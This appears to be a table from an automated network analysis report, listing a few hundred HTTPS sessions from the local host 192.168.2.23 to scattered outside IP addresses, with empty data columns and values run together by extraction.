                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27729192.168.2.2346608162.171.20.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27730192.168.2.235053265.2.89.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27731192.168.2.233422034.17.203.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27732192.168.2.234755631.132.151.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27733192.168.2.234498443.183.220.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27734192.168.2.234253213.216.27.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27735192.168.2.234710498.222.136.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27736192.168.2.23607548.148.152.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27737192.168.2.2340390136.114.65.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27738192.168.2.2346108151.110.10.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27739192.168.2.233976666.4.172.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27740192.168.2.2356146198.198.244.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27741192.168.2.235586674.212.235.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27742192.168.2.2336114164.210.234.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27743192.168.2.2333884209.86.229.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27744192.168.2.233582299.60.12.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27745192.168.2.2339722141.117.157.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27746192.168.2.233546477.220.137.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27747192.168.2.2360210180.121.212.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27748192.168.2.234788234.156.216.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27749192.168.2.2352552105.39.230.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27750192.168.2.233823038.76.134.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27751192.168.2.234198454.66.104.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27752192.168.2.2350290110.251.68.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27753192.168.2.233724027.94.25.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27754192.168.2.2334496170.24.60.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27755192.168.2.2357416114.84.251.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27756192.168.2.2360094193.125.187.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27757192.168.2.2348014185.61.70.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27758192.168.2.2345198112.137.28.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27759192.168.2.2355922143.44.247.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27760192.168.2.234774632.24.115.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27761192.168.2.2355162178.166.197.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27762192.168.2.2344542168.110.67.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27763192.168.2.2359410160.170.238.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27764192.168.2.235901653.237.10.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27765192.168.2.2348264129.26.82.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27766192.168.2.2342792211.147.191.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27767192.168.2.234089299.24.197.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27768192.168.2.2359644171.210.145.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27769192.168.2.233493496.39.155.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27770192.168.2.2343180124.168.199.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27771192.168.2.234778080.45.214.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27772192.168.2.2355552199.202.141.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27773192.168.2.2346808150.153.123.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27774192.168.2.235890851.104.40.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27775192.168.2.2359078128.110.24.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27776192.168.2.2347378167.104.122.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27777192.168.2.235412098.28.165.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27778192.168.2.2360036155.195.111.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27779192.168.2.23538009.47.22.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27780192.168.2.2352682150.84.191.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27781192.168.2.2335948160.183.230.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27782192.168.2.2346082175.124.145.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27783192.168.2.233279619.51.63.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27784192.168.2.2346682136.10.124.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27785192.168.2.2358368163.24.208.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27786192.168.2.235816620.29.36.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27787192.168.2.233687058.176.182.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27788192.168.2.234310271.238.217.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27789192.168.2.2347420144.136.80.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27790192.168.2.2343602152.243.82.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27791192.168.2.234813052.36.75.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27792192.168.2.2360090171.187.57.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27793192.168.2.2349448123.238.220.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27794192.168.2.235546827.227.213.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27795192.168.2.2353756178.242.18.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27796192.168.2.235223640.66.9.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27797192.168.2.2350224140.137.0.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27798192.168.2.234277849.151.205.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27799192.168.2.23601105.22.29.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27800192.168.2.2338652153.203.117.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27801192.168.2.2351156221.218.0.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27802192.168.2.2351282116.51.173.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27803192.168.2.2344238211.8.82.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27804192.168.2.2336408157.153.73.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27805192.168.2.235064269.33.131.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27806192.168.2.2351398209.189.238.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27807192.168.2.2355854178.112.204.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27808192.168.2.2354548209.37.9.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27809192.168.2.2349256191.190.179.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27810192.168.2.2340470146.80.240.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27811192.168.2.2335780176.90.220.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27812192.168.2.2342630125.243.30.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27813192.168.2.236040896.72.143.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27814192.168.2.2345896138.28.219.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27815192.168.2.2343264190.130.137.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27816192.168.2.2349668152.208.144.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27817192.168.2.236003863.99.38.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27818192.168.2.2354512131.83.82.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27819192.168.2.233811487.68.150.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27820192.168.2.235047644.92.116.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27821192.168.2.2345436120.253.222.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27822192.168.2.2342766173.245.89.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27823192.168.2.2343228178.226.225.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27824192.168.2.2355236146.129.135.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27825192.168.2.235299817.64.34.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27826192.168.2.233866883.65.130.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27827192.168.2.234071240.151.48.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27828192.168.2.233711265.165.118.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27829192.168.2.2343840157.15.135.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27830192.168.2.2340798113.30.175.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27831192.168.2.234698244.156.81.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27832192.168.2.235132814.237.57.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27833192.168.2.2348032189.85.154.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27834192.168.2.234954485.23.9.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27835192.168.2.2333860202.160.144.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27836192.168.2.233558258.24.39.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27837192.168.2.2343460100.173.208.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27838192.168.2.2343936216.59.71.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27839192.168.2.2336880191.116.35.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27840192.168.2.235343091.19.39.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27841192.168.2.2342980198.202.125.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27842192.168.2.234537236.205.166.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27843192.168.2.234669840.113.229.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27844192.168.2.2358290198.249.61.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27845192.168.2.2337666162.111.101.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27846192.168.2.2343526166.94.76.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27847192.168.2.2354416192.75.244.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27848192.168.2.2334286158.226.75.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27849192.168.2.235629636.151.110.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27850192.168.2.2358348160.130.53.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27851192.168.2.2342768216.16.64.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27852192.168.2.2357608219.241.213.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27853192.168.2.234340413.67.237.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27854192.168.2.233711219.98.142.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27855192.168.2.235861264.151.59.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27856192.168.2.233496279.234.100.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27857192.168.2.2350736162.245.43.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27858192.168.2.2344114185.88.150.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27859192.168.2.234361476.112.80.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27860192.168.2.2352412186.9.71.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27861192.168.2.2341386199.186.203.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27862192.168.2.234282417.138.136.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27863192.168.2.235543814.248.124.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27864192.168.2.2339022159.63.35.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27865192.168.2.2350334161.120.190.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27866192.168.2.2336192145.162.212.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27867192.168.2.236058884.122.173.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27868192.168.2.2335884134.33.226.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27869192.168.2.2354790154.98.176.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27870192.168.2.2337938142.83.70.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27871192.168.2.2356548194.163.17.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27872192.168.2.2333748158.227.178.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27873192.168.2.2337080194.149.151.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27874192.168.2.2333198172.36.206.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27875192.168.2.234773839.221.59.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27876192.168.2.2333970164.75.30.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27877192.168.2.2358530192.23.13.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27878192.168.2.2333022171.163.241.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27879192.168.2.235731241.175.74.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27880192.168.2.23430508.174.233.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27881192.168.2.234686461.248.104.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27882192.168.2.235997496.151.182.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27883192.168.2.235204235.145.205.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27884192.168.2.234133037.170.93.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27885192.168.2.233762890.36.229.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27886192.168.2.235127677.205.170.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27887192.168.2.2349244137.0.73.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27888192.168.2.2345282174.219.184.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27889192.168.2.233702459.196.64.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27890192.168.2.2346918223.5.254.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27891192.168.2.2343856138.215.79.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27892192.168.2.2341668198.226.139.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27893192.168.2.233768280.246.97.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27894192.168.2.234230037.112.120.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27895192.168.2.2352152157.175.250.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27896192.168.2.2356172106.207.166.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27897192.168.2.2352822147.235.211.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27898192.168.2.234263264.40.77.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27899192.168.2.235752841.221.157.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27900192.168.2.2354776172.76.133.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27901192.168.2.233486212.223.115.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27902192.168.2.2346604205.245.102.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27903192.168.2.233792239.96.111.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27904192.168.2.235095484.92.200.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27905192.168.2.2356208128.206.104.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27906192.168.2.235882472.67.195.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27907192.168.2.234371291.233.102.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27908192.168.2.236090614.15.183.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27909192.168.2.2358200216.127.225.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27910192.168.2.2333990111.153.35.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27911192.168.2.233805280.249.156.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27912192.168.2.2342394139.226.8.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27913192.168.2.234590223.0.21.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27914192.168.2.234157635.253.50.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27915192.168.2.2356672206.213.104.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27916192.168.2.236058451.236.176.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27917192.168.2.2350544113.77.109.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27918192.168.2.2343746201.131.124.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27919192.168.2.234117032.79.74.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27920192.168.2.234630820.231.67.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27921192.168.2.2359906179.200.224.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27922192.168.2.235057624.171.74.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27923192.168.2.233905276.156.128.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27924192.168.2.2348994208.193.88.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27925192.168.2.2333580103.9.219.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27926192.168.2.2346466206.26.2.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27927192.168.2.233590296.51.185.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27928192.168.2.233493275.168.31.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27929192.168.2.235503672.31.106.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27930192.168.2.235214265.138.0.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27931192.168.2.2347486116.64.134.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27932192.168.2.235768261.176.94.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27933192.168.2.2354152122.9.117.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27934192.168.2.2353118212.18.47.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27935192.168.2.235257695.226.104.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27936192.168.2.2342548200.90.10.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27937192.168.2.2335104105.81.195.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27938192.168.2.2338502128.187.183.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27939192.168.2.2344668103.55.151.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27940192.168.2.2340514139.81.202.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27941192.168.2.2350600189.164.136.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27942192.168.2.23516104.75.145.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27943192.168.2.235629657.2.44.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27944192.168.2.2336594141.37.81.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27945192.168.2.2350418203.213.65.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27946192.168.2.2350622131.57.44.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27947192.168.2.2348170154.162.255.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27948192.168.2.233501272.222.78.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27949192.168.2.2350630184.14.20.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
